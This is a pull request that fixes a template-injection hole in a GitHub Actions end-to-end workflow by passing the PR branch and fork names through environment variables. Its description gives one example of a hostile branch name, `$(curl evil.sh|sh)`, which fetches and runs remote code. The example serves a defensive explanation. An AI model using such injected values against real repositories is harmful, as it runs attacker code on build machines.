### PR TITLE
Fix template injection in E2E workflow

### DIFF
--- a/.github/workflows/e2e.yml
+++ b/.github/workflows/e2e.yml
@@ -54,9 +54,12 @@ jobs:
 
             -
                 name: Update Dead Code Detector
+                env:
+                    HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
+                    HEAD_REF: ${{ github.head_ref }}
                 run: |
-                    composer config repositories.pr vcs https://github.com/${{ github.event.pull_request.head.repo.full_name }}
-                    composer require --dev shipmonk/dead-code-detector:dev-${{ github.head_ref }} --with-all-dependencies --minimal-changes
+                    composer config repositories.pr vcs "https://github.com/$HEAD_REPO"
+                    composer require --dev "shipmonk/dead-code-detector:dev-$HEAD_REF" --with-all-dependencies --minimal-changes
 
             -
                 name: Run analysis


### PR DESCRIPTION
## What

The `Update Dead Code Detector` step in `.github/workflows/e2e.yml` expanded two attacker-controlled GitHub Actions expressions directly into the `run:` shell script:

- `${{ github.head_ref }}` — the PR branch name
- `${{ github.event.pull_request.head.repo.full_name }}` — the fork's name

Both are controlled by whoever opens the PR. A fork PR with a branch name like `$(curl evil.sh|sh)` would be expanded straight into the shell and **executed on the runner**.

## Fix

Pass both values through `env:` and reference them as quoted shell variables, so their contents can no longer break out of the string context and are treated as data, not code.

```yaml
env:
  HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
  HEAD_REF: ${{ github.head_ref }}
run: |
  composer config repositories.pr vcs "https://github.com/$HEAD_REPO"
  composer require --dev "shipmonk/dead-code-detector:dev-$HEAD_REF" ...
```

## Context

- Flagged by [zizmor](https://docs.zizmor.sh/audits/#template-injection) (`template-injection`, **High**).
- The workflow triggers on `pull_request` (not `pull_request_target`) and the repo's default `GITHUB_TOKEN` is read-only, so fork PRs get no secrets and a read-only token — this limited the blast radius to the ephemeral runner. The injection is fixed regardless.

Co-Authored-By: Claude Code